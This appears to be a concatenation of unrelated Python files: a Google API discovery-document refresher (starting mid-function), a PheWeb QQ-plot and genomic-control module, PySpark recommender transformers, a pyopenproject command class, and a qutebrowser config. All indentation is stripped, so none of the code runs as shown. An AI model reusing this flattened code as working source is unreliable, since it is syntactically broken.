all_discovery_documents = await asyncio.gather(*tasks, return_exceptions=True)
# Refresh discovery files in tests/data
for i, google_api in enumerate(all_discovery_documents):
name = all_apis[i][0]
version = all_apis[i][1]
if isinstance(google_api, HTTPError):
e = google_api
if e.res.status_code != 404:
print('Non 404 error')
print('\033[91m\n' + e + '\n\033[0m')
if e.res.status_code == 404:
# only ignore if it's a 404 error. Should raise an error otherwise
final_all_apis = list(filter(lambda api: (api[0] != name), final_all_apis))
file_errors.append({f"{name}-{version}": str(e)})
print(f'\033[91mError: Failed to download {name} {version}\033[0m')
continue
data_dir_name = current_dir + "/tests/data/"
try:
if not os.path.exists(data_dir_name):
os.makedirs(data_dir_name)
except OSError as e:
if e.errno != errno.EEXIST:
raise
# Save discovery docuemnt as .json file to the newly created data dir
file_name = (
current_dir
+ "/tests/data/"
+ name
+ "_"
+ version
+ "_discovery_doc.json"
)
with open(file_name, "w") as discovery_file:
json.dump(google_api.discovery_document, discovery_file)
print(f"saved {name}-{version} to {file_name}")
print("Done")
if file_errors:
print(f"Errors found: {str(file_errors)}")
with open("tests/ALL_APIS.py", "w") as f:
f.write("""### This file is autogenerated ###\n""")
f.write(f"ALL_APIS = {pprint.pformat(final_all_apis)}")
print("SUCCESS!")
if __name__ == "__main__":
asyncio.get_event_loop().run_until_complete(refresh_disc_docs_json())
| python |
"""
Create json files which can be used to render QQ plots.
Extracted from PheWeb: 2cfaa69
"""
# TODO: make gc_lambda for maf strata, and show them if they're >1.1?
# TODO: copy some changes from <https://github.com/statgen/encore/blob/master/plot-epacts-output/make_qq_json.py>
# Peter has included some original notes on the processing requirements, as follows::
# TODO: reduce QQ memory using Counter(v.qval for v in variants).
# - but we still need to split into 4 strata using MAF. Can that be done efficiently?
# a) we could keep balanced lists for the 4 strata, but we can only be confidently start processing variants
# once we've read 3/4 of all variants
# b) we could assume that, since we're sorted by chr-pos-ref-alt, MAF should be pretty randomly ordered.
# - then we could start processing variants after reading only 10% of all variants
# - if we're wrong, `raise StrataGuessingFailed()` and try again with sorting.
# c) we could run manhattan before this, and make it track Counter(rounded(v.maf,2) for v in variants).
# NOTE: `qval` means `-log10(pvalue)`
import collections
import logging
import math
import typing as ty
import boltons.iterutils
import boltons.mathutils
import scipy.stats
from zorp.parsers import BasicVariant
NUM_BINS = 400
NUM_MAF_RANGES = 4
MAF_SIGFIGS = 2
logger = logging.getLogger(__name__)
Variant = collections.namedtuple('Variant', ['qval', 'maf'])
def augment_variants(variants: ty.Iterator[BasicVariant], num_samples=None):
for var in variants:
if var.pvalue == 0:
# FIXME: Why does QQ plot require this stub value?
qval = 1000 # TODO(pjvh): make an option "convert_pval0_to = [num|None]"
else:
qval = var.neg_log_pvalue
af = var.maf
if af is not None:
af = round(af, MAF_SIGFIGS)
yield Variant(qval=qval, maf=af)
def round_sig(x, digits):
if x == 0:
return 0
elif abs(x) == math.inf or math.isnan(x):
raise ValueError("Cannot round infinity or NaN")
else:
log = math.log10(abs(x))
digits_above_zero = int(math.floor(log))
return round(x, digits - 1 - digits_above_zero)
# TODO: Move these to unit tests
assert round_sig(0.00123, 2) == 0.0012
assert round_sig(1.59e-10, 2) == 1.6e-10
def approx_equal(a, b, tolerance=1e-4):
return abs(a - b) <= max(abs(a), abs(b)) * tolerance
# TODO: Move these to unit tests
assert approx_equal(42, 42.0000001)
assert not approx_equal(42, 42.01)
def make_qq_stratified(variants):
# Some variants may be missing MAF. Sort those at the end of the list (eg, lump with the common variants)
variants = sorted(variants, key=lambda v: (v.maf is None, v.maf))
def make_strata(idx):
# Note: slice_indices[1] is the same as slice_indices[0] of the next slice.
# But that's not a problem, because range() ignores the last index.
slice_indices = (len(variants) * idx // NUM_MAF_RANGES,
len(variants) * (idx + 1) // NUM_MAF_RANGES)
qvals = sorted((variants[i].qval for i in range(*slice_indices)), reverse=True)
return {
'maf_range': (variants[slice_indices[0]].maf,
variants[slice_indices[1] - 1].maf),
'count': len(qvals),
'qq': compute_qq(qvals),
}
return [make_strata(i) for i in range(NUM_MAF_RANGES)]
def make_qq_unstratified(variants, include_qq):
qvals = sorted((v.qval for v in variants), reverse=True)
rv = {}
if include_qq:
rv['qq'] = compute_qq(qvals)
rv['count'] = len(qvals)
rv['gc_lambda'] = {}
for perc in ['0.5', '0.1', '0.01', '0.001']:
gc = gc_value_from_list(qvals, float(perc))
if math.isnan(gc) or abs(gc) == math.inf:
logger.warning('WARNING: got gc_value {!r}'.format(gc))
else:
rv['gc_lambda'][perc] = round_sig(gc, 5)
return rv
def compute_qq(qvals):
# qvals must be in decreasing order.
assert all(a >= b for a, b in boltons.iterutils.pairwise(qvals))
if len(qvals) == 0:
return []
if qvals[0] == 0:
logger.warning('WARNING: All pvalues are 1! How is that supposed to make a QQ plot?')
return []
max_exp_qval = -math.log10(0.5 / len(qvals))
# Our QQ plot will only show `obs_qval` up to `ceil(2*max_exp_pval)`.
# So we can drop any obs_qval above that, to save space and make sure the visible range gets all the NUM_BINS.
# this calculation must avoid dropping points that would be shown by the calculation done in javascript.
# `max_obs_qval` means the largest observed -log10(pvalue) that will be shown in the plot. It's usually NOT the
# largest in the data.
max_obs_qval = boltons.mathutils.clamp(qvals[0],
lower=max_exp_qval,
upper=math.ceil(2 * max_exp_qval))
if qvals[0] > max_obs_qval:
for qval in qvals:
if qval <= max_obs_qval:
max_obs_qval = qval
break
occupied_bins = set()
for i, obs_qval in enumerate(qvals):
if obs_qval > max_obs_qval:
continue
exp_qval = -math.log10((i + 0.5) / len(qvals))
exp_bin = int(exp_qval / max_exp_qval * NUM_BINS)
# TODO(pjvh): it'd be great if the `obs_bin`s started right at the lowest qval in that `exp_bin`.
# that way we could have fewer bins but still get a nice straight diagonal line without that
# stair-stepping appearance.
obs_bin = int(obs_qval / max_obs_qval * NUM_BINS)
occupied_bins.add((exp_bin, obs_bin))
bins = []
for exp_bin, obs_bin in occupied_bins:
assert 0 <= exp_bin <= NUM_BINS, exp_bin
assert 0 <= obs_bin <= NUM_BINS, obs_bin
bins.append((
exp_bin / NUM_BINS * max_exp_qval,
obs_bin / NUM_BINS * max_obs_qval
))
return {
'bins': sorted(bins),
'max_exp_qval': max_exp_qval,
}
def gc_value_from_list(qvals, quantile=0.5):
# qvals must be in decreasing order.
assert all(a >= b for a, b in boltons.iterutils.pairwise(qvals))
qval = qvals[int(len(qvals) * quantile)]
pval = 10 ** -qval
return gc_value(pval, quantile)
def gc_value(pval, quantile=0.5):
# This should be equivalent to R: `qchisq(median_pval, df=1, lower.tail=F) / qchisq(quantile, df=1, lower.tail=F)`
return scipy.stats.chi2.ppf(1 - pval, 1) / scipy.stats.chi2.ppf(1 - quantile, 1)
# TODO: These should be moved to unit tests
assert approx_equal(gc_value(0.49), 1.047457) # computed using R code.
assert approx_equal(gc_value(0.5), 1)
assert approx_equal(gc_value(0.50001), 0.9999533)
assert approx_equal(gc_value(0.6123), 0.5645607)
def get_confidence_intervals(num_variants, confidence=0.95):
one_sided_doubt = (1 - confidence) / 2
# `variant_counts` are the numbers of variants at which we'll calculate the confidence intervals
# any `1 <= variant_count <= num_variants-1` could be used, but scale in powers of 2 to make the CI visually smooth
variant_counts = []
for x in range(0, int(math.ceil(math.log2(num_variants)))):
variant_counts.append(2 ** x)
variant_counts.append(num_variants - 1)
variant_counts.reverse()
for variant_count in variant_counts:
rv = scipy.stats.beta(variant_count, num_variants - variant_count)
yield {
'x': round(-math.log10((variant_count - 0.5) / num_variants), 2),
'y_min': round(-math.log10(rv.ppf(1 - one_sided_doubt)), 2),
'y_max': round(-math.log10(rv.ppf(one_sided_doubt)), 2),
}
| python |
# coding: utf-8
from pyspark import keyword_only
from pyspark.ml import Transformer
from pyspark.ml.param.shared import Param
from pyspark.sql import SparkSession
import pyspark.sql.functions as F
spark = SparkSession.builder.getOrCreate()
class RatingBuilder(Transformer):
def _transform(self, raw_df):
rating_df = raw_df \
.selectExpr('from_user_id AS user', 'repo_id AS item', '1 AS rating', 'starred_at') \
.orderBy('user', F.col('starred_at').desc())
return rating_df
# TODO: 不適用新版的資料庫 schema 了,待處理
class DataCleaner(Transformer):
@keyword_only
def __init__(self, min_item_stargazers_count=None, max_item_stargazers_count=None, min_user_starred_count=None, max_user_starred_count=None):
super(DataCleaner, self).__init__()
self.min_item_stargazers_count = Param(self, 'min_item_stargazers_count', '移除 stargazer 數低於這個數字的 item')
self.max_item_stargazers_count = Param(self, 'max_item_stargazers_count', '移除 stargazer 數超過這個數字的 item')
self.min_user_starred_count = Param(self, 'min_user_starred_count', '移除 starred repo 數低於這個數字的 user')
self.max_user_starred_count = Param(self, 'max_user_starred_count', '移除 starred repo 數超過這個數字的 user')
self._setDefault(min_item_stargazers_count=1, max_item_stargazers_count=50000, min_user_starred_count=1, max_user_starred_count=50000)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, min_item_stargazers_count=None, max_item_stargazers_count=None, min_user_starred_count=None, max_user_starred_count=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def set_min_item_stargazers_count(self, value):
self._paramMap[self.min_item_stargazers_count] = value
return self
def get_min_item_stargazers_count(self):
return self.getOrDefault(self.min_item_stargazers_count)
def set_max_item_stargazers_count(self, value):
self._paramMap[self.max_item_stargazers_count] = value
return self
def get_max_item_stargazers_count(self):
return self.getOrDefault(self.max_item_stargazers_count)
def set_min_user_starred_count(self, value):
self._paramMap[self.min_user_starred_count] = value
return self
def get_min_user_starred_count(self):
return self.getOrDefault(self.min_user_starred_count)
def set_max_user_starred_count(self, value):
self._paramMap[self.max_user_starred_count] = value
return self
def get_max_user_starred_count(self):
return self.getOrDefault(self.max_user_starred_count)
def _transform(self, rating_df):
min_item_stargazers_count = self.get_min_item_stargazers_count()
max_item_stargazers_count = self.get_max_item_stargazers_count()
min_user_starred_count = self.get_min_user_starred_count()
max_user_starred_count = self.get_max_user_starred_count()
to_keep_items_df = rating_df \
.groupBy('item') \
.agg(F.count('user').alias('stargazers_count')) \
.where('stargazers_count >= {0} AND stargazers_count <= {1}'.format(min_item_stargazers_count, max_item_stargazers_count)) \
.orderBy('stargazers_count', ascending=False) \
.select('item', 'stargazers_count')
temp1_df = rating_df.join(to_keep_items_df, 'item', 'inner')
to_keep_users_df = temp1_df \
.groupBy('user') \
.agg(F.count('item').alias('starred_count')) \
.where('starred_count >= {0} AND starred_count <= {1}'.format(min_user_starred_count, max_user_starred_count)) \
.orderBy('starred_count', ascending=False) \
.select('user', 'starred_count')
temp2_df = temp1_df.join(to_keep_users_df, 'user', 'inner')
clean_df = temp2_df.select('user', 'item', 'rating', 'starred_at')
return clean_df
class PredictionProcessor(Transformer):
def _transform(self, predicted_df):
non_null_df = predicted_df.dropna(subset=['prediction', ])
prediction_df = non_null_df.withColumn('prediction', non_null_df['prediction'].cast('double'))
return prediction_df
| python |
import json
from pyopenproject.api_connection.exceptions.request_exception import RequestError
from pyopenproject.api_connection.requests.post_request import PostRequest
from pyopenproject.business.exception.business_error import BusinessError
from pyopenproject.business.services.command.work_package.work_package_command import WorkPackageCommand
from pyopenproject.model.form import Form
class CreateRelationForm(WorkPackageCommand):
def __init__(self, connection, work_package, relation):
super().__init__(connection)
self.work_package = work_package
self.relation = relation
def execute(self):
try:
json_obj = PostRequest(connection=self.connection,
context=f"{self.CONTEXT}/{self.work_package.id}/form",
json=json.dumps(self.relation.__dict__)).execute()
return Form(json_obj)
except RequestError as re:
raise BusinessError(f"Error creating relation for work package {self.work_package.id}") from re
| python |
# qutebrowser config.py
#
# NOTE: config.py is intended for advanced users who are comfortable
# with manually migrating the config file on qutebrowser upgrades. If
# you prefer, you can also configure qutebrowser using the
# :set/:bind/:config-* commands without having to write a config.py
# file.
#
# Documentation:
# qute://help/configuring.html
# qute://help/settings.html
# Uncomment this to still load settings configured via autoconfig.yml
# config.load_autoconfig()
# Aliases for commands. The keys of the given dictionary are the
# aliases, while the values are the commands they map to.
# Type: Dict
c.aliases = {
'wq' : 'quit --save',
'w' : 'session-save',
'q' : 'quit',
'pe' : 'set content.proxy http://localhost:8080',
'pd' : 'set content.proxy system',
'mpv' : 'spawn --userscript mpv'
}
# Require a confirmation before quitting the application.
# Type: ConfirmQuit
# Valid values:
# - always: Always show a confirmation.
# - multiple-tabs: Show a confirmation if multiple tabs are opened.
# - downloads: Show a confirmation if downloads are running
# - never: Never show a confirmation.
c.confirm_quit = ['never']
# Maximum time (in minutes) between two history items for them to be
# considered being from the same browsing session. Items with less time
# between them are grouped when being displayed in `:history`. Use -1 to
# disable separation.
# Type: Int
c.history_gap_interval = 30
# When to find text on a page case-insensitively.
# Type: IgnoreCase
# Valid values:
# - always: Search case-insensitively.
# - never: Search case-sensitively.
# - smart: Search case-sensitively if there are capital characters.
c.search.ignore_case = 'smart'
# Find text on a page incrementally, renewing the search for each typed
# character.
# Type: Bool
c.search.incremental = True
# How to open links in an existing instance if a new one is launched.
# This happens when e.g. opening a link from a terminal. See
# `new_instance_open_target_window` to customize in which window the
# link is opened in.
# Type: String
# Valid values:
# - tab: Open a new tab in the existing window and activate the window.
# - tab-bg: Open a new background tab in the existing window and activate the window.
# - tab-silent: Open a new tab in the existing window without activating the window.
# - tab-bg-silent: Open a new background tab in the existing window without activating the window.
# - window: Open in a new window.
c.new_instance_open_target = 'tab'
# Which window to choose when opening links as new tabs. When
# `new_instance_open_target` is set to `window`, this is ignored.
# Type: String
# Valid values:
# - first-opened: Open new tabs in the first (oldest) opened window.
# - last-opened: Open new tabs in the last (newest) opened window.
# - last-focused: Open new tabs in the most recently focused window.
# - last-visible: Open new tabs in the most recently visible window.
c.new_instance_open_target_window = 'last-focused'
# Name of the session to save by default. If this is set to null, the
# session which was last loaded is saved.
# Type: SessionName
c.session.default_name = None
# Load a restored tab as soon as it takes focus.
# Type: Bool
c.session.lazy_restore = False
# Backend to use to display websites. qutebrowser supports two different
# web rendering engines / backends, QtWebKit and QtWebEngine. QtWebKit
# was discontinued by the Qt project with Qt 5.6, but picked up as a
# well maintained fork: https://github.com/annulen/webkit/wiki -
# qutebrowser only supports the fork. QtWebEngine is Qt's official
# successor to QtWebKit. It's slightly more resource hungry than
# QtWebKit and has a couple of missing features in qutebrowser, but is
# generally the preferred choice.
# Type: String
# Valid values:
# - webengine: Use QtWebEngine (based on Chromium).
# - webkit: Use QtWebKit (based on WebKit, similar to Safari).
c.backend = 'webengine'
# Time interval (in milliseconds) between auto-saves of
# config/cookies/etc.
# Type: Int
c.auto_save.interval = 15000
# Always restore open sites when qutebrowser is reopened.
# Type: Bool
c.auto_save.session = False
# Automatically start playing `<video>` elements. Note: On Qt < 5.11,
# this option needs a restart and does not support URL patterns.
# Type: Bool
c.content.autoplay = True
# Size (in bytes) of the HTTP network cache. Null to use the default
# value. With QtWebEngine, the maximum supported value is 2147483647 (~2
# GB).
# Type: Int
c.content.cache.size = None
# Allow websites to read canvas elements. Note this is needed for some
# websites to work properly.
# Type: Bool
c.content.canvas_reading = True
# Which cookies to accept. With QtWebEngine, this setting also controls
# other features with tracking capabilities similar to those of cookies;
# including IndexedDB, DOM storage, filesystem API, service workers, and
# AppCache. Note that with QtWebKit, only `all` and `never` are
# supported as per-domain values. Setting `no-3rdparty` or `no-
# unknown-3rdparty` per-domain on QtWebKit will have the same effect as
# `all`. If this setting is used with URL patterns, the pattern gets
# applied to the origin/first party URL of the page making the request,
# not the request URL.
# Type: String
# Valid values:
# - all: Accept all cookies.
# - no-3rdparty: Accept cookies from the same origin only. This is known to break some sites, such as GMail.
# - no-unknown-3rdparty: Accept cookies from the same origin only, unless a cookie is already set for the domain. On QtWebEngine, this is the same as no-3rdparty.
# - never: Don't accept cookies at all.
config.set('content.cookies.accept', 'all', 'chrome-devtools://*')
# Which cookies to accept. With QtWebEngine, this setting also controls
# other features with tracking capabilities similar to those of cookies;
# including IndexedDB, DOM storage, filesystem API, service workers, and
# AppCache. Note that with QtWebKit, only `all` and `never` are
# supported as per-domain values. Setting `no-3rdparty` or `no-
# unknown-3rdparty` per-domain on QtWebKit will have the same effect as
# `all`. If this setting is used with URL patterns, the pattern gets
# applied to the origin/first party URL of the page making the request,
# not the request URL.
# Type: String
# Valid values:
# - all: Accept all cookies.
# - no-3rdparty: Accept cookies from the same origin only. This is known to break some sites, such as GMail.
# - no-unknown-3rdparty: Accept cookies from the same origin only, unless a cookie is already set for the domain. On QtWebEngine, this is the same as no-3rdparty.
# - never: Don't accept cookies at all.
config.set('content.cookies.accept', 'all', 'devtools://*')
# Which cookies to accept. With QtWebEngine, this setting also controls
# other features with tracking capabilities similar to those of cookies;
# including IndexedDB, DOM storage, filesystem API, service workers, and
# AppCache. Note that with QtWebKit, only `all` and `never` are
# supported as per-domain values. Setting `no-3rdparty` or `no-
# unknown-3rdparty` per-domain on QtWebKit will have the same effect as
# `all`. If this setting is used with URL patterns, the pattern gets
# applied to the origin/first party URL of the page making the request,
# not the request URL.
# Type: String
# Valid values:
# - all: Accept all cookies.
# - no-3rdparty: Accept cookies from the same origin only. This is known to break some sites, such as GMail.
# - no-unknown-3rdparty: Accept cookies from the same origin only, unless a cookie is already set for the domain. On QtWebEngine, this is the same as no-3rdparty.
# - never: Don't accept cookies at all.
c.content.cookies.accept = 'no-3rdparty'
# Store cookies. Note this option needs a restart with QtWebEngine on Qt
# < 5.9.
# Type: Bool
c.content.cookies.store = True
# Default encoding to use for websites. The encoding must be a string
# describing an encoding such as _utf-8_, _iso-8859-1_, etc.
# Type: String
c.content.default_encoding = 'utf-8'
# Limit fullscreen to the browser window (does not expand to fill the
# screen).
# Type: Bool
c.content.fullscreen.window = False
# Allow websites to share screen content. On Qt < 5.10, a dialog box is
# always displayed, even if this is set to "true".
# Type: BoolAsk
# Valid values:
# - true
# - false
# - ask
c.content.desktop_capture = 'ask'
# Try to pre-fetch DNS entries to speed up browsing.
# Type: Bool
c.content.dns_prefetch = True
# Allow websites to request geolocations.
# Type: BoolAsk
# Valid values:
# - true
# - false
# - ask
c.content.geolocation = 'ask'
# Value to send in the `Accept-Language` header. Note that the value
# read from JavaScript is always the global value.
# Type: String
c.content.headers.accept_language = 'en-US,en'
# Custom headers for qutebrowser HTTP requests.
# Type: Dict
c.content.headers.custom = {}
# Value to send in the `DNT` header. When this is set to true,
# qutebrowser asks websites to not track your identity. If set to null,
# the DNT header is not sent at all.
# Type: Bool
c.content.headers.do_not_track = True
# When to send the Referer header. The Referer header tells websites
# from which website you were coming from when visiting them. No restart
# is needed with QtWebKit.
# Type: String
# Valid values:
# - always: Always send the Referer.
# - never: Never send the Referer. This is not recommended, as some sites may break.
# - same-domain: Only send the Referer for the same domain. This will still protect your privacy, but shouldn't break any sites. With QtWebEngine, the referer will still be sent for other domains, but with stripped path information.
c.content.headers.referer = 'same-domain'
# User agent to send. The following placeholders are defined: *
# `{os_info}`: Something like "X11; Linux x86_64". * `{webkit_version}`:
# The underlying WebKit version (set to a fixed value with
# QtWebEngine). * `{qt_key}`: "Qt" for QtWebKit, "QtWebEngine" for
# QtWebEngine. * `{qt_version}`: The underlying Qt version. *
# `{upstream_browser_key}`: "Version" for QtWebKit, "Chrome" for
# QtWebEngine. * `{upstream_browser_version}`: The corresponding
# Safari/Chrome version. * `{qutebrowser_version}`: The currently
# running qutebrowser version. The default value is equal to the
# unchanged user agent of QtWebKit/QtWebEngine. Note that the value
# read from JavaScript is always the global value. With QtWebEngine
# between 5.12 and 5.14 (inclusive), changing the value exposed to
# JavaScript requires a restart.
# Type: FormatString
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}) AppleWebKit/{webkit_version} (KHTML, like Gecko) {upstream_browser_key}/{upstream_browser_version} Safari/{webkit_version}', 'https://web.whatsapp.com/')
# User agent to send. The following placeholders are defined: *
# `{os_info}`: Something like "X11; Linux x86_64". * `{webkit_version}`:
# The underlying WebKit version (set to a fixed value with
# QtWebEngine). * `{qt_key}`: "Qt" for QtWebKit, "QtWebEngine" for
# QtWebEngine. * `{qt_version}`: The underlying Qt version. *
# `{upstream_browser_key}`: "Version" for QtWebKit, "Chrome" for
# QtWebEngine. * `{upstream_browser_version}`: The corresponding
# Safari/Chrome version. * `{qutebrowser_version}`: The currently
# running qutebrowser version. The default value is equal to the
# unchanged user agent of QtWebKit/QtWebEngine. Note that the value
# read from JavaScript is always the global value. With QtWebEngine
# between 5.12 and 5.14 (inclusive), changing the value exposed to
# JavaScript requires a restart.
# Type: FormatString
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}; rv:71.0) Gecko/20100101 Firefox/71.0', 'https://accounts.google.com/*')
# User agent to send. The following placeholders are defined: *
# `{os_info}`: Something like "X11; Linux x86_64". * `{webkit_version}`:
# The underlying WebKit version (set to a fixed value with
# QtWebEngine). * `{qt_key}`: "Qt" for QtWebKit, "QtWebEngine" for
# QtWebEngine. * `{qt_version}`: The underlying Qt version. *
# `{upstream_browser_key}`: "Version" for QtWebKit, "Chrome" for
# QtWebEngine. * `{upstream_browser_version}`: The corresponding
# Safari/Chrome version. * `{qutebrowser_version}`: The currently
# running qutebrowser version. The default value is equal to the
# unchanged user agent of QtWebKit/QtWebEngine. Note that the value
# read from JavaScript is always the global value. With QtWebEngine
# between 5.12 and 5.14 (inclusive), changing the value exposed to
# JavaScript requires a restart.
# Type: FormatString
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99 Safari/537.36', 'https://*.slack.com/*')
# User agent to send. The following placeholders are defined: *
# `{os_info}`: Something like "X11; Linux x86_64". * `{webkit_version}`:
# The underlying WebKit version (set to a fixed value with
# QtWebEngine). * `{qt_key}`: "Qt" for QtWebKit, "QtWebEngine" for
# QtWebEngine. * `{qt_version}`: The underlying Qt version. *
# `{upstream_browser_key}`: "Version" for QtWebKit, "Chrome" for
# QtWebEngine. * `{upstream_browser_version}`: The corresponding
# Safari/Chrome version. * `{qutebrowser_version}`: The currently
# running qutebrowser version. The default value is equal to the
# unchanged user agent of QtWebKit/QtWebEngine. Note that the value
# read from JavaScript is always the global value. With QtWebEngine
# between 5.12 and 5.14 (inclusive), changing the value exposed to
# JavaScript requires a restart.
# Type: FormatString
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}; rv:71.0) Gecko/20100101 Firefox/71.0', 'https://docs.google.com/*')
# User agent to send. The following placeholders are defined: *
# `{os_info}`: Something like "X11; Linux x86_64". * `{webkit_version}`:
# The underlying WebKit version (set to a fixed value with
# QtWebEngine). * `{qt_key}`: "Qt" for QtWebKit, "QtWebEngine" for
# QtWebEngine. * `{qt_version}`: The underlying Qt version. *
# `{upstream_browser_key}`: "Version" for QtWebKit, "Chrome" for
# QtWebEngine. * `{upstream_browser_version}`: The corresponding
# Safari/Chrome version. * `{qutebrowser_version}`: The currently
# running qutebrowser version. The default value is equal to the
# unchanged user agent of QtWebKit/QtWebEngine. Note that the value
# read from JavaScript is always the global value. With QtWebEngine
# between 5.12 and 5.14 (inclusive), changing the value exposed to
# JavaScript requires a restart.
# Type: FormatString
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}; rv:71.0) Gecko/20100101 Firefox/71.0', 'https://drive.google.com/*')
# Enable host blocking.
# Type: Bool
c.content.host_blocking.enabled = True
# List of URLs of lists which contain hosts to block. The file can be
# in one of the following formats: - An `/etc/hosts`-like file - One
# host per line - A zip-file of any of the above, with either only one
# file, or a file named `hosts` (with any extension). It's also
# possible to add a local file or directory via a `file://` URL. In case
# of a directory, all files in the directory are read as adblock lists.
# The file `~/.config/qutebrowser/blocked-hosts` is always read if it
# exists.
# Type: List of Url
c.content.host_blocking.lists = ['https://raw.githubusercontent.com/StevenBlack/hosts/master/hosts']
# A list of patterns that should always be loaded, despite being ad-
# blocked. Note this whitelists blocked hosts, not first-party URLs. As
# an example, if `example.org` loads an ad from `ads.example.org`, the
# whitelisted host should be `ads.example.org`. If you want to disable
# the adblocker on a given page, use the `content.host_blocking.enabled`
# setting with a URL pattern instead. Local domains are always exempt
# from hostblocking.
# Type: List of UrlPattern
c.content.host_blocking.whitelist = ['piwik.org']
# Enable hyperlink auditing (`<a ping>`).
# Type: Bool
c.content.hyperlink_auditing = False
# Load images automatically in web pages.
# Type: Bool
config.set('content.images', True, 'chrome-devtools://*')
# Load images automatically in web pages.
# Type: Bool
config.set('content.images', True, 'devtools://*')
# Load images automatically in web pages.
# Type: Bool
c.content.images = True
# Show javascript alerts.
# Type: Bool
c.content.javascript.alert = True
# Allow JavaScript to read from or write to the clipboard. With
# QtWebEngine, writing the clipboard as response to a user interaction
# is always allowed.
# Type: Bool
c.content.javascript.can_access_clipboard = False
# Allow JavaScript to open new tabs without user interaction.
# Type: Bool
c.content.javascript.can_open_tabs_automatically = False
# Enable JavaScript.
# Type: Bool
config.set('content.javascript.enabled', True, 'chrome-devtools://*')
# Enable JavaScript.
# Type: Bool
config.set('content.javascript.enabled', True, 'devtools://*')
# Enable JavaScript.
# Type: Bool
config.set('content.javascript.enabled', True, 'chrome://*/*')
# Enable JavaScript.
# Type: Bool
config.set('content.javascript.enabled', True, 'qute://*/*')
# Enable JavaScript.
# Type: Bool
c.content.javascript.enabled = True
# Log levels to use for JavaScript console logging messages. When a
# JavaScript message with the level given in the dictionary key is
# logged, the corresponding dictionary value selects the qutebrowser
# logger to use. On QtWebKit, the "unknown" setting is always used. The
# following levels are valid: `none`, `debug`, `info`, `warning`,
# `error`.
# Type: Dict
c.content.javascript.log = {'error': 'debug', 'warning': 'debug', 'unknown': 'debug', 'info': 'debug'}
# Use the standard JavaScript modal dialog for `alert()` and
# `confirm()`.
# Type: Bool
c.content.javascript.modal_dialog = False
# Show javascript prompts.
# Type: Bool
c.content.javascript.prompt = True
# Allow locally loaded documents to access remote URLs.
# Type: Bool
c.content.local_content_can_access_remote_urls = False
# Allow locally loaded documents to access other local URLs.
# Type: Bool
c.content.local_content_can_access_file_urls = True
# Enable support for HTML 5 local storage and Web SQL.
# Type: Bool
c.content.local_storage = True
# Netrc-file for HTTP authentication. If unset, `~/.netrc` is used.
# Type: File
c.content.netrc_file = None
# Allow pdf.js to view PDF files in the browser. Note that the files can
# still be downloaded by clicking the download button in the pdf.js
# viewer.
# Type: Bool
c.content.pdfjs = True
# Allow websites to request persistent storage quota via
# `navigator.webkitPersistentStorage.requestQuota`.
# Type: BoolAsk
# Valid values:
# - true
# - false
# - ask
c.content.persistent_storage = 'ask'
# Enable plugins in Web pages.
# Type: Bool
c.content.plugins = True
# Draw the background color and images also when the page is printed.
# Type: Bool
c.content.print_element_backgrounds = True
# Open new windows in private browsing mode which does not record
# visited pages.
# Type: Bool
c.content.private_browsing = False
# Proxy to use. In addition to the listed values, you can use a
# `socks://...` or `http://...` URL. Note that with QtWebEngine, it will
# take a couple of seconds until the change is applied, if this value is
# changed at runtime.
# Type: Proxy
# Valid values:
# - system: Use the system wide proxy.
# - none: Don't use any proxy
c.content.proxy = 'system'
# Validate SSL handshakes.
# Type: BoolAsk
# Valid values:
# - true
# - false
# - ask
c.content.ssl_strict = 'ask'
# List of user stylesheet filenames to use.
# Type: List of File, or File
c.content.user_stylesheets = []
# Enable WebGL.
# Type: Bool
c.content.webgl = True
# Monitor load requests for cross-site scripting attempts. Suspicious
# scripts will be blocked and reported in the devtools JavaScript
# console. Note that bypasses for the XSS auditor are widely known and
# it can be abused for cross-site info leaks in some scenarios, see:
# https://www.chromium.org/developers/design-documents/xss-auditor
# Type: Bool
c.content.xss_auditing = True
# Height (in pixels or as percentage of the window) of the completion.
# Type: PercOrInt
c.completion.height = '25%'
# Move on to the next part when there's only one possible completion
# left.
# Type: Bool
c.completion.quick = True
# When to show the autocompletion window.
# Type: String
# Valid values:
# - always: Whenever a completion is available.
# - auto: Whenever a completion is requested.
# - never: Never.
c.completion.show = 'always'
# Shrink the completion to be smaller than the configured size if there
# are no scrollbars.
# Type: Bool
c.completion.shrink = True
# Width (in pixels) of the scrollbar in the completion window.
# Type: Int
c.completion.scrollbar.width = 12
# Padding (in pixels) of the scrollbar handle in the completion window.
# Type: Int
c.completion.scrollbar.padding = 2
# Format of timestamps (e.g. for the history completion). See
# https://sqlite.org/lang_datefunc.html for allowed substitutions.
# Type: String
c.completion.timestamp_format = '%d/%m'
# Delay (in milliseconds) before updating completions after typing a
# character.
# Type: Int
c.completion.delay = 0
# Minimum amount of characters needed to update completions.
# Type: Int
c.completion.min_chars = 1
# Execute the best-matching command on a partial match.
# Type: Bool
c.completion.use_best_match = False
# Directory to save downloads to. If unset, a sensible OS-specific
# default is used.
# Type: Directory
c.downloads.location.directory = '/home/jagreen/dld'
# Prompt the user for the download location. If set to false,
# `downloads.location.directory` will be used.
# Type: Bool
c.downloads.location.prompt = False
# Remember the last used download directory.
# Type: Bool
c.downloads.location.remember = True
# What to display in the download filename input.
# Type: String
# Valid values:
# - path: Show only the download path.
# - filename: Show only download filename.
# - both: Show download path and filename.
c.downloads.location.suggestion = 'path'
# Default program used to open downloads. If null, the default internal
# handler is used. Any `{}` in the string will be expanded to the
# filename, else the filename will be appended.
# Type: String
c.downloads.open_dispatcher = None
# Where to show the downloaded files.
# Type: VerticalPosition
# Valid values:
# - top
# - bottom
c.downloads.position = 'top'
# Duration (in milliseconds) to wait before removing finished downloads.
# If set to -1, downloads are never removed.
# Type: Int
c.downloads.remove_finished = 50
# Editor (and arguments) to use for the `open-editor` command. The
# following placeholders are defined: * `{file}`: Filename of the file
# to be edited. * `{line}`: Line in which the caret is found in the
# text. * `{column}`: Column in which the caret is found in the text. *
# `{line0}`: Same as `{line}`, but starting from index 0. * `{column0}`:
# Same as `{column}`, but starting from index 0.
# Type: ShellCommand
c.editor.command = ['nvim', '{file}']
# Encoding to use for the editor.
# Type: Encoding
c.editor.encoding = 'utf-8'
